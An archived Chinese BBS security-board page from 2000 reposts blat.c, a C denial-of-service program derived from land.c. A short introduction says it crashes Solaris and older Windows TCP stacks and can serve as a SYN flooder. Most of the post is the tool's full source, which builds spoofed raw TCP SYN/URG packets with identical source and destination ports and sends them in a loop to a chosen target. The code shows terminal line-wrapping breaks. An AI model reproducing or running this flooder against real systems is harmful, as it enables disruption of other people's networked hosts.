358.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="359.htm">下一篇</a>]
<hr><p align="left"><small>发信人: cloudsky (小四), 信区: Security <br>
标  题: blat.c <br>
发信站: 武汉白云黄鹤站 (Wed Jan  5 13:26:17 2000), 站内信件 <br>
blat.c was originally born out of some firewall 'exercising' that <br>
I was doing. More on that at a later date, but I came across an <br>
amusing bug in some windoze IP stacks and a nasty one in slowaris. <br>
The code below is just land.c slightly modified to trigger the bugs <br>
and can be used as a brain dead SYN flooder. The windoze bug seems to <br>
have now been fixed but went like this....after receiving a large <br>
number of TCP open requests left in the SYN state, the TCP portion of <br>
the IP stack would cease to work. ICMP, udp etc were fine but no <br>
new incoming or outgoing TCP sessions work. <br>
Further research lead to the slowaris DoS regarding its handling of <br>
TCP open requests with the urg flag set. It would seem the IP stack <br>
reserves resources for such an urgent open request and after <br>
receiving a large number, it ceases to respond. To make things <br>
worse, if the admin of the box you blat HUPs the controlling process, <br>
it panics. :) oops. <br>
/* blat.c by Loneguard 14/01/99 ( based on land.c by m3lt, FLC ) */ <br>
#include <stdio.h> <br>
#include <netdb.h> <br>
#include <arpa/inet.h> <br>
#include <netinet/in.h> <br>

#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/ip_tcp.h> <br>
#include <netinet/protocols.h> <br>
struct pseudohdr <br>
{ <br>
        struct in_addr saddr; <br>
        struct in_addr daddr; <br>
        u_char zero; <br>
        u_char protocol; <br>
        u_short length; <br>
        struct tcphdr tcpheader; <br>
}; <br>
u_short checksum(u_short * data,u_short length) <br>
{ <br>
        register long value; <br>
        u_short i; <br>
        for(i=0;i<(length>>1);i++) <br>
                value+=data[i]; <br>
        if((length&1)==1) <br>
                value+=(data[i]<<8); <br>

        value=(value&65535)+(value>>16); <br>
        return(~value); <br>
} <br>
int main(int argc,char * * argv) <br>
{ <br>
        struct sockaddr_in sin; <br>
        struct sockaddr_in sin2; <br>
        struct hostent * hoste; <br>
        int sock,i; <br>
        int foobart=1000; <br>
        u_char foobarflags=TH_SYN; <br>
        char buffer[40]; <br>
        struct iphdr * ipheader=(struct iphdr *) buffer; <br>
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip <br>
hdr) <br>
); <br>
        struct pseudohdr pseudoheader; <br>
        fprintf(stderr,"blat.c by Loneguard\n"); <br>
        if(argc<4) <br>
        { <br>
                fprintf(stderr,"usage: %s [source IP] [target IP] [port] <re <br>
ps> <br>
ps> <br>
<urg>\n",argv[0]); <br>
                return(-1); <br>
        } <br>
        bzero(&sin,sizeof(struct sockaddr_in)); <br>
        sin.sin_family=AF_INET; <br>
        bzero(&sin2,sizeof(struct sockaddr_in)); <br>
        sin2.sin_family=AF_INET; <br>
        if((hoste=gethostbyname(argv[1]))!=NULL) <br>
                bcopy(hoste->h_addr,&sin2.sin_addr,hoste->h_length); <br>
        else if((sin2.sin_addr.s_addr=inet_addr(argv[1]))==-1) <br>
        { <br>
                fprintf(stderr,"unknown host %s\n",argv[1]); <br>
                return(-1); <br>
        } <br>
        if((hoste=gethostbyname(argv[2]))!=NULL) <br>
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); <br>
        else if((sin.sin_addr.s_addr=inet_addr(argv[2]))==-1) <br>
        { <br>
                fprintf(stderr,"unknown host %s\n",argv[2]); <br>
                return(-1); <br>
        } <br>
        if((sin.sin_port=htons(atoi(argv[3])))==0) <br>

        { <br>
                fprintf(stderr,"unknown port %s\n",argv[3]); <br>
                return(-1); <br>
        } <br>
        if (argc>=5) foobart=atoi(argv[4]); <br>
        if (argc>=6) foobarflags=0x22; <br>
        if((sock=socket(AF_INET,SOCK_RAW,255))==-1) <br>
        { <br>
                fprintf(stderr,"couldn't allocate raw socket\n"); <br>
                return(-1); <br>
        } <br>
        for ( i=0;i<foobart;i++ ) { <br>
                sin2.sin_addr.s_addr=htonl(ntohl(sin2.sin_addr.s_addr)+1); <br>
                bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); <br>
                ipheader->version=4; <br>
                ipheader->ihl=sizeof(struct iphdr)/4; <br>
                ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct t <br>
cphd <br>
r)); <br>
                ipheader->id=htons(0xF1C); <br>
                ipheader->ttl=255; <br>
                ipheader->protocol=IP_TCP; <br>

                ipheader->saddr=sin2.sin_addr.s_addr; <br>
                ipheader->daddr=sin.sin_addr.s_addr; <br>
                tcpheader->th_sport=sin.sin_port; <br>
                tcpheader->th_dport=sin.sin_port; <br>
                tcpheader->th_seq=htonl(0xF1C); <br>
                /* tcpheader->th_flags=TH_SYN&&TH_URG; */ <br>
                tcpheader->th_flags=foobarflags; <br>
                tcpheader->th_off=sizeof(struct tcphdr)/4; <br>
                tcpheader->th_win=htons(2048); <br>
                tcpheader->th_urp=htons(666); <br>
                bzero(&pseudoheader,12+sizeof(struct tcphdr)); <br>
                pseudoheader.saddr.s_addr=sin2.sin_addr.s_addr; <br>
                pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; <br>
                pseudoheader.protocol=6; <br>
                pseudoheader.length=htons(sizeof(struct tcphdr)); <br>
                bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,si <br>
zeof <br>
(struct tcphdr)); <br>
                tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+size <br>
of(s <br>
truct tcphdr)); <br>
                if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcp <br>

hdr) <br>
,0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) <br>
                { <br>
                        fprintf(stderr,"couldn't send packet\n"); <br>
                        return(-1); <br>
                } <br>
        } <br>
        fprintf(stderr,"%s:%s blated!\n",argv[2],argv[3]); <br>
        close(sock); <br>
        return(0); <br>
-- <br>
            我问飘逝的风：来迟了？ <br>
            风感慨：是的，他们已经宣战。 <br>
            我问苏醒的大地：还有希望么？ <br>
            大地揉了揉眼睛：还有，还有无数代的少年。 <br>
            我问长空中的英魂：你们相信？ <br>
            英魂带着笑意离去：相信，希望还在。 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="359.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>